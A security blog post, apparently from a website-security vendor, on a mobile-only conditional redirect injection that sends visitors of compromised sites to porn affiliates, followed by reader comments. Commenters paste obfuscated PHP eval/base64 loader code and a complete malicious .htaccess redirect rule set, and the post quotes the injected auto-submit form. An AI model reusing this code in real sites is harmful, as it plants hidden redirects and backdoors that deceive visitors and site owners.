BaDoink Website Redirect – Malicious Redirections to Porn Websites on Mobile Devices

The past week has brought about a large number of cases where compromised websites had hidden redirections to porn injected into their code. All the infections had a similar pattern where they only targeted mobile devices. They are highly conditional as well making it challenging for webmasters to detect.

Lets take a minute to explain what is going on.

Conditional Redirects to Porn Websites Targeting Mobile Devices

Sounds complicated, but it isn’t. If the visitor is coming from an iPad, iPhone, Android or other similar mobile device, the page is redirected to a random pornographic page. If the same person tries to visit the site again, nothing happens and the site loads properly. What gives?

1. The Word is “Conditional”

The malware injected on the website is intelligent. It stores the IP address for all the visitors that it redirects to the porn website. If you see the redirect once, it is likely that you won’t see it again for many hours. This makes the malware very difficult to detect and leads people to think it was a random error or that maybe they mistyped the URL.

2. Mobile-Only

This injection is only redirecting mobile browsers. It’s targets seems to be iPhone, iPad, Android and a few other mobile OS browsers. For everyone else, the site looks clean and safe.

3. Mobile-only + Conditional = Very hard to detect

When you mix conditional with mobile-specific infections, you know it will be very difficult to detect. Yes, even SiteCheck has a hard time flagging it. It will flag the site once, but if the user forces a re-scan it will show the website as clean.

As you can imagine, it can be very confusing for the end user.

Browser-site injection

Rafael Capovilla, one of our Sr. Analysts, was the first to find and decipher how the injection is displayed on the browser. It is very sneaky, accomplishing it’s goal by utilizing a form like this one:

<form method=POST action="http://gridironservices.com/579205f64a3c6…php?q=b9f6606dcd0186725..” id=”refoto_form” target=”_top”>

With random domains (intelligenthometheater.com, gridironservices.com, etc). That by itself it looks ok, but embedded you’ll find this javascript code:

document.getElementById("refoto_form"). submit( );

This forces the POST to be submitted and the visitor redirected. At first glance they both look legitimate and will likely pass as clean for most (if not all) anti-virus and security tools.

As mentioned before, this only appears on Mobile devices and conditionally. You might be wondering why they would redirect to porn. As is often the case, it’s all about the money.

These pages are the first level in the redirection funnel. They proceed to push the user to affiliate/ads links, similar to these: httx://ads. mobiteasy.com/ or httx://www. instabang.com/tour/zinstabang.

They pay the malware authors good money for every click.

Removing the Porn Redirection

Shameless Plug: If you have used SiteCheck and notice the issue I mentioned above – showing dirty then clean or not showing at all – have no fear, this does happen from time to time it’s how the scanner works. Rest assured though that our team is able to address the issue and our internal scanners will catch the issue outright once configured.

To address the issue yourself investigate these locations:

  • /index.php
  • /wp-config.php (if using WordPRess)
  • /configuration.php (if using Joomla)
  • /wp-content/themes/yourtheme/functions.php (if using WordPress)

These are the 4 places we see this injection being added. Note that it is highly encoded, you will have to look for any line that looks out of place and it’s best to engage your developer for help.

Remember, the issue at the surface – the infection – is only the tip of the iceberg. If your website is infected you have to assume that the attackers have penetrated your defenses and have added controls that will allow them to continue to penetrate your environment. Be sure to look for backdoors.

If you have any question, let us know. You can also engage us on Twitter at Sucuri Support or Sucuri Labs.

26 comments
  1. A good way to find malicious code hidden in a configuration file is to download the original file again and do a diff against it, normally the only lines that are different are the database connection

  2. This exact symptoms happen to my WordPress site, so I re-installed WordPress, plugins & theme files (all latest version), but the symptoms still happened. I’ve investigated the files index.php, wp-config.php & my theme’s functions.php file but found nothing.

    When I scanned my site using Sucuri scanner, it said there’re malware, and it disclosed a “suspicious” script hosted externally. The script is an advertisement script from a Russian ad agency that bought banner ad placement on my site. So, I’m guessing this is where it’s hidden. Am I right?

    1. Possibly, hard to say without diving into the site itself. Are you an existing client?

      1. No, I’m not an existing client. But the scan is clean when I removed the ad code.

    2. I saw the same happen a long time ago when I used a smaller advertising network which still exists today. I wont name them. However, they only checked the ad when it was submitted. To save time, they didnt check revisions. So you would get an advert submission for something normal like a pair of shoes. After the advert was accepted, they would change it to malware. If the link and category are unchanged, then they dont re-authenticate it.
      Remove the ad code from your site, scan again, if it is clean, report it to the ad agency. If you leave it on your site, it could be removed from google to protect users.

  3. For the longest time i have been scratching my head over this. Thanks to this post and others, i managed to solve my issue. I just want to share how i did, to return the favor.

    In my case, I am using wordpress and there were two files that were affected.

    /index.php
    /wp-content/themes/YourWordpressTheme/index.php

    When you open the two files, you will see that there are a bunch of jumbled code inside, like

    “function POdaAm1RYOEnqZI5($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v){return str_replace($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v);} function I8BRJNlvVcv8BKEn($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v){return str_replace($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v);} function I0amzoGWejZvWj1qMXXyLvu($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v){return str_replace($s9NxMYSy0e,$XsP1GuFJu,$cVlNK0hXh7v);} $apXLsRB9qp1jAdt2 = ‘bljoeka8eAj6wpeJaljoeka8eAj6wpeJsljoeka8eAj6wpeJeljoeka8eAj6wpeJ6ljoeka8eAj6wpeJ4ljoeka8eAj6wpeJ_ljoeka8eAj6wpeJdljoeka8eAj6wpeJeljoeka8eAj6wpeJcljoeka8eAj6wpeJoljoeka8eAj6wpeJdljoeka8eAj6wpeJe’; $apXLsRB9qp1jAdt2 = I0amzoGWejZvWj1qMXXyLvu(‘ljoeka8eAj6wpeJ’,”,$apXLsRB9qp1jAdt2); $WETSqAfZOqV73vT = ‘cOuwZMdqMtFDD6HrOuwZMdqMtFDD6HeOuwZMdqMtFDD6HaOuwZMdqMtFDD6HtOuwZMdqMtFDD6HeOuwZMdqMtFDD6H_OuwZMdqMtFDD6HfOuwZMdqMtFDD6HuOuwZMdqMtFDD6HnOuwZMdqMtFDD6HcOuwZMdqMtFDD6HtOuwZMdqMtFDD6HiOuwZMdqMtFDD6HoOuwZMdqMtFDD6Hn’; $WETSqAfZOqV73vT = I0amzoGWejZvWj1qMXXyLvu(‘OuwZMdqMtFDD6H’,”,$WETSqAfZOqV73vT); $JsmNP8kuxuqpV = ‘gYI6cMgcLlDVegYI6cMgcLlDVvgYI6cMgcLlDVagYI6cMgcLlDVl’; $JsmNP8kuxuqpV = I0amzoGWejZvWj1qMXXyLvu(‘gYI6cMgcLlDV’,”,$JsmNP8kuxuqpV); $D4gkz02Pq8F5pq2iLMd3ZQ = ‘$ynk5tMJWc7CSwVHPzj52BAPu’; $YX13lmjB70wdaV33Ak25fhm = $WETSqAfZOqV73vT($D4gkz02Pq8F5pq2iLMd3ZQ,$JsmNP8kuxuqpV.'(‘.$apXLsRB9qp1jAdt2.'(‘.$D4gkz02Pq8F5pq2iLMd3ZQ.’));’); $YX13lmjB70wdaV33Ak25fhm(‘ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBFWWxaYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelpFeFdTRTVNVVRJeGMySlZiRVJhTW1oaFlteGFNVmRVVGxOalIwbDVUbGRh

    This is just a portion of it, but basically you should be able to see the “>?php” then follow by function or str replace..” and a lot of the gibberish code.

    What i did was just to remove all the gibberish and have only the original stuff left. For wordpress index.php, the original file is

    ——————————

    ——————————

    Make sure the “” is at the end. Otherwise you will have errors going to your website url.

    I also made sure my index.php and .htaccess file permissions is 644 instead of 755. Not sure if this will help but i think its probably more secure.

    Hope this help others 🙂

    Cheers,
    Henry

    1. OK, so you removed the bad code from your site.

      What did you do to isolate the _cause_ of the compromise?

      Or is your site just sitting there waiting to get shat all over again?

  4. How do you fix this problem? I am not that computer (iPad) savvy. Can you do it yourself at home? How? Thanks

  5. I have this problem, in the index.php file in the wp-content it appeared normal untill I copied and pasted the text which was became:

    <?php function SLXF4wIYe8gaAWqkEEKmwN($wcKYaJb4klPzTKP6,$HhhgejEQxE0W9i,$APva6cdOLMIMh){return str_replace($wcKYaJb4klPzTKP6,$HhhgejEQxE0W9i,$APva6cdOLMIMh);} function yIYMWY4J626B6V3T89mlOc($wcKYaJb4klPzTKP6,$HhhgejEQxE0W9i,$APva6cdOLMIMh){return str_replace($wcKYaJb4klPzTKP6,$HhhgejEQxE0W9i,$APva6cdOLMIMh);} function zui34qmG($wcKYaJb4klPzTKP6,$HhhgejEQxE0W9i,$APva6cdOLMIMh){return str_replace($wcKYaJb4klPzTKP6,$HhhgejEQxE0W9i,$APva6cdOLMIMh);} $XsiNWJuhdB7XE6P99 = 'bOU4Ou82qfjJlidaOU4Ou82qfjJlidsOU4Ou82qfjJlideOU4Ou82qfjJlid6OU4Ou82qfjJlid4OU4Ou82qfjJlid_OU4Ou82qfjJliddOU4Ou82qfjJlideOU4Ou82qfjJlidcOU4Ou82qfjJlidoOU4Ou82qfjJliddOU4Ou82qfjJlide'; $XsiNWJuhdB7XE6P99 = zui34qmG('OU4Ou82qfjJlid','',$XsiNWJuhdB7XE6P99); $eFJ0EpyNnSHGoML2ag = 'csFBkuY8oqq0hfLNnKgErNdtnrsFBkuY8oqq0hfLNnKgErNdtnesFBkuY8oqq0hfLNnKgErNdtnasFBkuY8oqq0hfLNnKgErNdtntsFBkuY8oqq0hfLNnKgErNdtnesFBkuY8oqq0hfLNnKgErNdtn_sFBkuY8oqq0hfLNnKgErNdtnfsFBkuY8oqq0hfLNnKgErNdtnusFBkuY8oqq0hfLNnKgErNdtnnsFBkuY8oqq0hfLNnKgErNdtncsFBkuY8oqq0hfLNnKgErNdtntsFBkuY8oqq0hfLNnKgErNdtnisFBkuY8oqq0hfLNnKgErNdtnosFBkuY8oqq0hfLNnKgErNdtnn'; $eFJ0EpyNnSHGoML2ag = zui34qmG('sFBkuY8oqq0hfLNnKgErNdtn','',$eFJ0EpyNnSHGoML2ag); $dHUkcqD6fxj5 = 'jdThawi4mejdThawi4mvjdThawi4majdThawi4ml'; $dHUkcqD6fxj5 = zui34qmG('jdThawi4m','',$dHUkcqD6fxj5); $GzlzX4k9MsbG3PcI = '$bF569Uo92zg3wW3c5SQVyT4'; $Fi80Ervm = $eFJ0EpyNnSHGoML2ag($GzlzX4k9MsbG3PcI,$dHUkcqD6fxj5.'('.$XsiNWJuhdB7XE6P99.'('.$GzlzX4k9MsbG3PcI.'));');

    This was a small portion of it, my question is why did I have to copy and paste it to see what was actually there – using Notepad++?

    1. missed the trick with copy and pasting “” became “<?php function SLXF4wIYe8gaAWqkEEKmwN($wcKYaJb4klPzTKP6,$HhhgejEQxE0W9i,$APva6cdOLMIMh){return str_replace($wcKYaJb4klPzTKP6,$HhhgejEQxE0W9i,$APva6cdOLMIMh);} function yIYMWY4J626B6V3T89mlOc($wcKYaJb4klPzTKP6,$HhhgejEQxE0W9i,$APva6cdOLMIMh){return str_replace($wcKYaJb4klPzTKP6,$HhhgejEQxE0W9i,$APva6cdOLMIMh);} function zui34qmG($wcKYaJb4klPzTKP6,$HhhgejEQxE0W9i,$APva6cdOLMIMh){return str_replace($wcKYaJb4klPzTKP6,$HhhgejEQxE0W9i,$APva6cdOLMIMh);} $XsiNWJuhdB7XE6P99 = 'bOU4Ou82qfjJlidaOU4Ou82qfjJlidsOU4Ou82qfjJlideOU4Ou82qfjJlid6OU4Ou82qfjJlid4OU4Ou82qfjJlid_OU4Ou82qfjJliddOU4Ou82qfjJlideOU4Ou82qfjJlidcOU4Ou82qfjJlidoOU4Ou82qfjJliddOU4Ou82qfjJlide'; $XsiNWJuhdB7XE6P99 = zui34qmG('OU4Ou82qfjJlid','',$XsiNWJuhdB7XE6P99); $eFJ0EpyNnSHGoML2ag = 'csFBkuY8oqq0hfLNnKgErNdtnrsFBkuY8oqq0hfLNnKgErNdtnesFBkuY8oqq0hfLNnKgErNdtnasFBkuY8oqq0hfLNnKgErNdtntsFBkuY8oqq0hfLNnKgErNdtnesFBkuY8oqq0hfLNnKgErNdtn_sFBkuY8oqq0hfLNnKgErNdtnfsFBkuY8oqq0hfLNnKgErNdtnusFBkuY8oqq0hfLNnKgErNdtnnsFBkuY8oqq0hfLNnKgErNdtncsFBkuY8oqq0hfLNnKgErNdtntsFBkuY8oqq0hfLNnKgErNdtnisFBkuY8oqq0hfLNnKgErNdtnosFBkuY8oqq0hfLNnKgErNdtnn'; $eFJ0EpyNnSHGoML2ag = zui34qmG('sFBkuY8oqq0hfLNnKgErNdtn','',$eFJ0EpyNnSHGoML2ag); $dHUkcqD6fxj5 = 'jdThawi4mejdThawi4mvjdThawi4majdThawi4ml'; $dHUkcqD6fxj5 = zui34qmG('jdThawi4m','',$dHUkcqD6fxj5); $GzlzX4k9MsbG3PcI = '$bF569Uo92zg3wW3c5SQVyT4'; $Fi80Ervm = $eFJ0EpyNnSHGoML2ag($GzlzX4k9MsbG3PcI,$dHUkcqD6fxj5.'('.$XsiNWJuhdB7XE6P99.'('.$GzlzX4k9MsbG3PcI.'));'); $Fi80Ervm('ZXZhbChiYXNlNjRfZGVjb2RlKCJaWFpoYkNoaVlYTmxOalJmWkdWamIyUmxLQ0phV0Zwb1lrTm9hVmxZVG14T2FsSm1Xa2RXYW1JeVVteExRMHBFWWxaYU5Wa3lNRFZsVm1kNlUyMTRhbEo2YkRWYVJXUnpaRlp3TlZvelpFeFdTRTVNVVRJeGMySlZiRVJhTW1oaFlteGFNVmRVVGxOalIwbDVUbGRhWVZkSGFIZFplazVUWld0MFJGTnRSbFZXUmxwNFZGYzFSbVF5VFhsaFJ6RlpUVEJLZDFreU1EVmliVWw1WXpKc1RGVXlkek5STWpGaFRWZEtkRlJxUW1oV2Vtd3hVMVZhZDFSck5WaGlNMnhxVmtWS05sbFZaR0ZhYlU1SVlraHNhVTF0VWpKWldHeHVZMGRXTTJOSWJHRlhSa2w0V1RJd01Gb3hjSFJT"

      1. Hi Joe,

        Did you ever figure out why you needed to copy/paste?

        I just downloaded the entire site backup file and did a scan, but haven’t been able to find the malware code.

        Thx!

  6. Hi, My name is Matthew and I work for BaDoink.

    Thanks to Daniel for writing this and helping users identify this issue.

    We strongly believe this was an external affiliate who was redirecting traffic to our website and as a result of this, they have been banned from our program.

    We run a popular affiliate program; our brand has a large, global presence and notable market share. The overwhelming majority of affiliates promoting us are clean, honest and law-abiding; however not everyone in the world of online marketing is bound to a moral compass; some are predatory. When we identify such an affiliate, one who engages in illegal activities, seeks profit through deceptive or criminal marketing practices, that affiliate is terminated immediately.

    If anybody has any new information about this topic then please feel free to message me so we can sort this out.

    matthew(at)badoink(.)com.

    Thanks, Matthew

  7. This is code they entered in the htaccess on my client WP:
    All web-content folders and files was also infected by trojan

    RewriteEngine On

    RewriteCond %{HTTP_USER_AGENT} ^1207.*|^3gso.*|^4thp.*|^501i.*|^502i.*|^503i.*|^504i.*|^505i.*|^506i.*|.*Fennec.*|^6310.*|^6590.*|^770s.*|^802s.*|.*a100.*|.*a510.*|.*a511.*|^abac.*|^acer.*|^acoo.*|^acs.*|^aiko.*|^airn.*|.*alacatel.*|^alav.*|^alca.*|^alco.*|^amoi.*|^Amoi.*|.*android.*|^anex.*|^anny.*|^anyw.*|^aptu.*|^arch.*|^argo.*|^aste.*|^asus.*|^ASUS.*|^attw.*|^au.*|^audi.*|^Audiovox.*|^AU-MIC.*|^aur.*|^aus.*|^avan.*|^beck.*|^bell.*|^benq.*|^BenQ.*|^bilb.*|^bird.*|^Bird.*|^blac.*|.*BlackBerry.*|^blaz.*|.*Blazer.*|.*boxee.*|.*BRAVIA.*|^brew.*|^brvw.*|^bumb.*|^bw.*|^c55.*|^capi.*|^ccwa.*|^cdm.*|^CDM.*|.*CE-HTML.*|^cell.*|^chtm.*|^cldc.*|^cmd.*|^comp.*|^cond.*|.*CorePlayer.*|^craw.*|^dait.*|^dall.*|^dang.*|^dbte.*|^dc.*|.*dell streak.*|^devi.*|^dica.*|.*DLNA.*|.*DLNADOC.*|^dmob.*|^doco.*|^DoCoMo.*|^dopo.*|^dopod.*|^ds.*|^ds12.*|^el49.*|^elai.*|^eml2.*|^emul.*|^eric.*|.*Ericsson.*|^erk0.*|^esl8.*|^ez40.*|^ez60.*|^ez70.*|^ezos.*|^ezwa.*|^ezze.*|^fake.*|^fetc.*|^fly.*|.*FlyCast.*|.*foobar2000.*|^g1.*|^g560.*|^gene.*|^gf.*|^go.*|.*GomPlayer.*|^good.*|.*GoogleTV.*|^grad.*|^grun.*|^haie.*|^Haier.*|.*hbbtv.*|.*HbbTV.*|^hcit.*|^hd.*|^hei.*|^hipt.*|^hita.*|^HP.*|.*htc.*|^htca.*|^htcg.*|^htcp.*|^htcs.*|^htct.*|^http.*|^huaw.*|.*Huawei.*|^hutc.*|^i230.*|^iac.*|^ibro.*|^idea.*|.*iemobile.*|^ig01.*|^ikom.*|^im1k.*|^i-mobile.*|^inno.*|.*ipad.*|^ipaq.*|.*iPAQ.*|.*iphone.*|.*iPod.*|^iris.*|.*iTunes.*|^jata.*|^java.*|^jbro.*|^jemu.*|^jigs.*|^kddi.*|^KDDI.*|^keji.*|^kgt.*|.*kindle.*|^klon.*|^KONKA.*|^kpt.*|^kwc.*|^KWC.*|^kyoc.*|^kyok.*|.*Large Screen.*|^leno.*|^Lenovo.*|^lexi.*|^lg.*|^lg50.*|^lg54.*|^lge.*|^libw.*|^lynx.*|^m3ga.*|^m50.*|^mate.*|^maui.*|^maxo.*|^mc01.*|^mc21.*|^mcca.*|^medi.*|^merc.*|^meri.*|^midp.*|.*midp.*|.*mini.*|^mio8.*|^mioa.*|.*Miro.*|^mits.*|^mmef.*|^mo01.*|^mo02.*|^mobi.*|.*mobile.*|^mode.*|^modo.*|^mot.*|^motv.*|^mozz.*|.*MPlayer.*|.*MSN.*|^mt50.*|^mtp1.*|^mtv.*|^mwbp.*|^mywa.*|^n100.*|^n101.*|^n102.*|^n202.*|^n203.*|^n300.*|^n302.*|^n500.*|^n502.*|^n505.*|^n700.*|^n701.*|^n710.*|^nec.*|^NEC-.*|^nem.*|^neon.*|^netf.*|.*NETTV.*|^newg.*|^NEWGEN.*|^newt.*|.*Nexus 10.*|.*Nexus 7.*|.*Nintendo.*|^nok6.*|^noki.*|.*Nokia.*|.*Novarra.*|^nzph.*|^o2.*|.*o2.*|.*O2.*|^o2im.*|.*Opera.Mobi.*|^opti.*|^opwv.*|^oran.*|^owg1.*|^p800.*|.*Palm.*|^pana.*|^Panasonic.*|^pand.*|^pant.*|^PANTECH.*|^pdxg.*|^PG.*|^pg13.*|^phil.*|^Philips.*|^pire.*|^play.*|.*PLAYSTATION 3.*|.*Plex.*|^pluc.*|^pock.*|.*pocket.*|^port.*|^portalmmm.*|^pose.*|^PPC.*|^prox.*|.*PS3.*|^psio.*|.*psp.*|^qc07.*|^qc12.*|^qc21.*|^qc32.*|^qc60.*|^qci.*|^qtek.*|^Qtek.*|.*QuickTime.*|^qwap.*|^r380.*|^r600.*|^raks.*|^rim9.*|^rove.*|^rozo.*|^s55.*|^sage.*|^Sagem.*|^SAGEM.*|^sama.*|^samm.*|^sams.*|.*SAMSUNG.*|^sany.*|.*Sanyo.*|^sava.*|^sc01.*|^sch.*|^SCH.*|.*SCH-.*|.*sch-i800.*|^scoo.*|^scp.*|^sdk.*|^se47.*|^sec.*|^SEC.*|^sec0.*|^sec1.*|^semc.*|.*SEMC-Browser.*|^send.*|^Sendo.*|^seri.*|^sgh.*|^SGH.*|.*SGH-.*|.*sgh-t849.*|^shar.*|^Sharp.*|.*shw-m180s.*|^sie.*|^SIE.*|^siem.*|^SIEMENS.*|.*silk.*|^sl45.*|^slid.*|^smal.*|^smar.*|.*Smarthub.*|.*smartphone.*|.*SmartTV.*|.*SMART-TV.*|^smb3.*|^smit.*|^smt5.*|^soft.*|^SoftBank.*|^sony.*|^SonyEricsson|^SonyEricsson.*|.*SonyEricsson.*|^sp01.*|^sph.*|^SPH.*|^spv.*|^sy01.*|^symb.*|.*symbian.*|.*SymbianOS.*|^t218.*|^t250.*|^t600.*|^t610.*|^t618.*|.*tablet.*|^tagt.*|^talk.*|^tcl.*|^tdg.*|.*teleca.*|^teli.*|^telm.*|^tim.*|^topl.*|^tosh.*|.*Toshiba.*|.*treo.*|^ts70.*|^tsm.*|^tsm3.*|^tsm5.*|.*up.browser.*|^upg1.*|.*up.link.*|.*UPnP.*|^upsi.*|^UTS.*|^utst.*|^v400.*|^v750.*|^veri.*|^Vertu.*|^virg.*|^vite.*|^vk40.*|^vk50.*|^vk52.*|^vk53.*|.*VLC media player.*|^vm40.*|^voda.*|.*vodafone.*|^vulc.*|^vx52.*|^vx53.*|^vx60.*|^vx61.*|^vx70.*|^vx80.*|^vx81.*|^vx83.*|^vx85.*|^vx98.*|^w3c.*|.*WAFA.*|^wap.*|.*wap.*|^wapa.*|^wapi.*|^wapj.*|^wapm.*|^wapp.*|^wapr.*|^waps.*|^wapt.*|^wapu.*|^wapv.*|^wapy.*|^webc.*|.*webOS.*|.*WebTV.*|^whit.*|.*BOLT.*|^wig.*|.*wii.*|^winc.*|.*windows ce.*|.*Windows.CE.*|.*Windows-Media-Player.*|.*WindowsPhone.*|.*Windows Phone.*|^winw.*|^wmlb.*|^wonu.*|^x700.*|.*XBMC.*|.*xbox.*|^xda.*|.*Xda.*|^xda2.*|^xdag.*|^yas.*|^your.*|^zeto.*|^ZTE.* [NC,OR]

    RewriteCond %{HTTP_ACCEPT} text/vnd.wap.wml|application/vnd.wap.xhtml+xml [NC,OR]

    RewriteCond %{HTTP:HTTP_X_WAP_PROFILE} .+ [OR]

    RewriteCond %{HTTP:HTTP_PROFILE} .+ [OR]

    RewriteCond %{HTTP:X-OperaMini-Features} .+ [OR]

    RewriteCond %{HTTP:UA-pixels} .+

    RewriteRule ^(.*)$ http://m.mobi-avto.ru [L,R=302]

  8. Fantastic article – thanks. Clear path to fixing it. Am wondering how to prevente a recurrence though – is this an automated drive-by or does it require manual intervention?

    Does anyone know the vulnerability which allowed this code to be injected? Is this an attack on the admin password or a plugin?

    1. I’m pretty sure that .htaccess is affected to btw – would recommend checking this and probably doing a complete review. Checking it out.

  9. Thanks a lot. I found this same giberrish code in my .htaccess , deleted it and saved the file, but 8 hours after, it was injected into my site again. Please what else did you do.

    Did you find any backdor or modified any permission after deleting the gibberish code in .htaccess.

    Will appreciate your reply. Thanks

  10. This problem seems to be getting more sophisticated. Have several sites on the same hosting company that are infected. The domains are registered with different registrars. I looked through each of the four files listed above and didn’t find anything changed compared to the previous backup before the infection. In the meanwhile, to be safe, have changed the sites nameservers on the registrar to prevent users from being redirected to the porn sites. However, the sites still redirect despite the change even after clearing the browser cookies and cache on my phone. This makes me wonder if the issue is at the server level on the host or the redirect at the registrar?

    1. The few URLs that had not been accessed on my mobile device, but were
      infected and had their nameserver changed show the registrars parked
      page and do not redirect to the porn site. BaDoink and Mobiteasy may try
      to act like they are responsible, but that is like a crack producer
      saying they tell all their “dealers” to be honest, ethical, and moral.
      Guess the only satisfaction I get (besides filing the usual complaints
      with FBI) is in all the times we had to hit their sites to do testing
      knowing they had to pay their rogue affiliate yet not get a penny in
      sign-ups. If anyone knows how we can put something back on the sanitized
      site to clean the infected mobile browsers, let us know. Thanks for all
      the previous posts and help!

  11. I found this occurred recently on a site of ours and the scan indicated that FancyBox was the issue. I removed that and the issue was resolved.

  12. Having the same issue with a site I manage.

    I started by searching all the index, function and wp-config files and wasn’t able to find the code.

    I then downloaded a backup of the site and did a search for some of the code referenced by SiteCheck. I was only able to find the code in the SQL file associated with the backup.

    Any thoughts on how I can track down which php file the code is hiding in? One of the commenters mentioned that the code only appeared after he had copy and pasted it into a text doc. I’m wondering if that has something to do with why I’m having such a hard time finding it.

    Any help/thoughts would be greatly appreciated.

  13. I was simply looking up fish diseases on my iPad to figure out what was wrong with one of my fish, and I get redirected to see a naked black woman asking if I was 18 on the screen. This is a seriously fucked up hack.
    I’m glad I at least know why it happened after reading this page…

  14. Im having the same issue. As per the discussions below I have checked all wordpress files /index.php, mytheme/index.php, config.php and functions.php and can find nothing wrong. Has anyone found an alternative solution?

  15. When I am forced redirectes to porn, it wasn’t too bad since I can just close it or go back. But recently I been redirected to illegal sites, and im not sure if this police warning is real or just part of the advert scam

Comments are closed.

You May Also Like